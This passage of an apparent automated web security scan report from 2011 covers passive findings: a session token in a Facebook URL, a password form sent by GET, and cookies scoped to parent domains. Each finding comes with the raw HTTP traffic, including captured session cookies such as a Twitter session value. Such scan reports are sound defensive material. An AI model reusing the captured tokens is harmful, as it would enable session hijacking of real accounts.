<input type="password" id="commentFrmPasswordLogin" name="commentFrmPasswordLogin" data-encryptable="true" data-validations="mandatory tooLong tooShort" data-inlineError="true" data-errorContainer="true" data-mandatoryMessage="A Password is required." data-tooLongLength="20" data-tooLongMessage="Your Password must be less than 20 characters." data-tooShortLength="3" data-tooShortMessage="Your Password must be more than 4 characters."/>
<span class="note error">
...[SNIP]...

6. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /extern/login_status.php?api_key=135447496484311&app_id=135447496484311&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df347e34f8%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20a74e1c%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bc6f7cb4%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9093e24%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12efd808c%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e2ba23a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c723d684&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.25.26
X-Cnection: close
Date: Wed, 07 Sep 2011 14:14:43 GMT
Content-Length: 249

<script type="text/javascript">
parent.postMessage("cb=f9093e24&origin=http\u00253A\u00252F\u00252Fwww.perthnow.com.au\u00252Ff1e2ba23a8&relation=parent&transport=postmessage&frame=f1c723d684", "http:
...[SNIP]...

7. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /res/libraries/pluck/abc.pluck-1.latest.min.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /res/libraries/pluck/abc.pluck-1.latest.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 21 Feb 2011 00:41:45 GMT
ETag: "16545ae-6697-20d00440"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=6708
Expires: Wed, 07 Sep 2011 16:06:01 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 26263
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853269; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var ABC=ABC?ABC:{};ABC.Pluck=function(g){function b(h,j,i){if(ABC.Debug&&typeof(console)!=="undefined"&&typeof(console.log)!=="undefined"){console.log("Namespace="+h+", Function="+j+":");console.log(i
...[SNIP]...
L)){j.referringURL=""}}if(v){t=h(v,"&","=");k(t.a,j.loggedInMsg,j.loginContainer);n(j)}else{if(j.autoLogout){n(j)}}}function e(t,u,y,w,x,v){if(!c(t+" #abc_pluck-login-form").length){c(t).append('\n\t\t<form id="abc_pluck-login-form" action="#" method="'+v+'">\n\t\t\t<fieldset>
...[SNIP]...
</label>\n\t\t\t\t<input type="password" id="abc_pluck-login-form-password" name="'+y+'" size="16" maxlength="16" value="" />\n\n\t\t\t\t<input type="hidden" id="abc_pluck-login-form-referrer" name="'+w+'" value="'+x+'" />
...[SNIP]...

8. Cookie scoped to parent domain  previous  next
There are 83 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


8.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json?screen_name=6PR&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=4&clientsource=TWITTERINC_WIDGET&1315422890878=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.6pr.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; k=50.23.123.106.1315399813016770

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:09 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315404909-73233-31934
X-RateLimit-Limit: 150
ETag: "edc1631aa3b276626127bfaca5c64c3d"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 07 Sep 2011 14:15:09 GMT
X-RateLimit-Remaining: 127
X-Runtime: 0.03682
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114b25934d0
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 9262dbfaae94eed8e5d327795189a6f9e3fa6b14
X-RateLimit-Reset: 1315408477
Set-Cookie: guest_id=v1%3A13154049095134771; domain=.twitter.com; path=/; expires=Sat, 07 Sep 2013 02:15:09 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCJaQPUQyASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWYy%250AYzc4ZTc0ODZjMjg4MmI3MmU3NGE3MjNmZTA1OGFiOgxjc3JmX2lkIiVkOWY4%250ANDM5YmZkMWZkNDM4MjliNzA5NGFlZWIzZmRiZg%253D%253D--6c7b0340f09028e47b9b2e51788093d370f5d1f0; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 13688
Connection: close

TWTR.Widget.receiveCallback_1([{"in_reply_to_user_id_str":null,"coordinates":null,"in_reply_to_user_id":null,"contributors":null,"retweeted":false,"retweet_count":7,"id_str":"111365530862108672","retw
...[SNIP]...

8.2. http://a.triggit.com/pxrucm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.triggit.com
Path:   /pxrucm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pxrucm HTTP/1.1
Host: a.triggit.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Set-Cookie: trgu=f0be7f74-7052-4a09-8aa0-ca59d82b3888; domain=.triggit.com; path=/; expires=Wed, 07-Sep-2016 00:00:00 GMT;
Location: http://pixel.rubiconproject.com/tap.php?v=4554&nid=1430&put=f0be7f74-7052-4a09-8aa0-ca59d82b3888&expires=180
Date: Wed, 07 Sep 2011 14:14:14 GMT
Content-Length: 11
Content-Type: text/html; charset=ISO-8859-1

Redirecting

8.3. http://ad.agkn.com/iframe!t=1131!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1131!?che=232308004977525073&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=232308004977525073&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDABvUqUAAAAAAKWdKAAAAAAAAAAEAAYAAAAAAA4AAQAECv9yGAAAAAAApOAxAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAt.P91Hhp9D9mZmZmZmYAQLfz.dR4aQRAZmZmZmZmEEC38.3UeGkEQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbWlKL0GCwCkbi.Ht16nRW0QY8xOdnphfsjmdBAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933,Z%3D728x90%26_salt%3D1883775268%26anmember%3D514%26anprice%3D%26keyword%3Dwa%2Fnews_home%26r%3D0%26s%3D814544,b9e906a8-d95b-11e0-963b-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Mon, 05-Sep-2016 14:15:20 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 722
Date: Wed, 07 Sep 2011 14:15:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...

8.4. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6864322&rn=0.7252024607732892&c7=http%3A%2F%2Fweb.adblade.com%2Fimps.php%3Fapp%3D3695%26ad_width%3D300%26ad_height%3D250%26title_font%3D1%26title_color%3D000000%26description_font%3D1%26description_color%3D0066cc%26id%3D83%26output%3Dhtml%26tpUrl%3Dhttp%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000801647%2Fmnum%3D0000905406%2Fcstr%3D35058392%3D_4e677c35%2C2342476011%2C801647%5E905406%5E1184%5E0%2C1_%2Fxsxdata%3D%24xsxdata%2Fbnum%3D35058392%2Foptn%3D64%3Ftrg%3Dhttp%253a%252f%252fwww.adblade.com&c3=&c4=&c5=&c6=&c10=&c15=&c16=&c8=&c9=http%3A%2F%2Fwww.perthnow.com.au%2F&cv=1.8 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 07 Sep 2011 14:14:17 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Fri, 06-Sep-2013 14:14:17 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


8.5. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=535039&ev=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev="1:535461.2925993182975414771.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Sat, 01-Sep-2012 14:16:01 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Thu, 06-Sep-2012 14:16:01 GMT; Path=/
Content-Type: image/gif
Date: Wed, 07 Sep 2011 14:16:01 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

8.6. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.rb.ntc.ace.advertising.com
Path:   /site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth HTTP/1.1
Host: bid.rb.ntc.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Cneonction: close
Date: Wed, 07 Sep 2011 14:14:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960484.799975.0XMC
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:38 GMT; path=/
Set-Cookie: ASCID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: 70524729=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: F1=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: BASE=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: GUID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ROLL=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:38 GMT
Content-Type: text/html; charset=utf-8
ntCoent-Length: 581
Content-Length: 581

<script type="text/javascript" src="http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=0651551808&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_
...[SNIP]...

8.7. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.rb.ntc.ace.advertising.com
Path:   /site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth HTTP/1.1
Host: bid.rb.ntc.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Cneonction: close
Date: Wed, 07 Sep 2011 14:16:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960484.799975.0XMC
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:16:54 GMT; path=/
Set-Cookie: 70524729=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ASCID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: F1=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: BASE=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: GUID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ROLL=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: 54069056=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:16:54 GMT
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 581
Content-Length: 581

<script type="text/javascript" src="http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=8251023631&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=68910242=_
...[SNIP]...

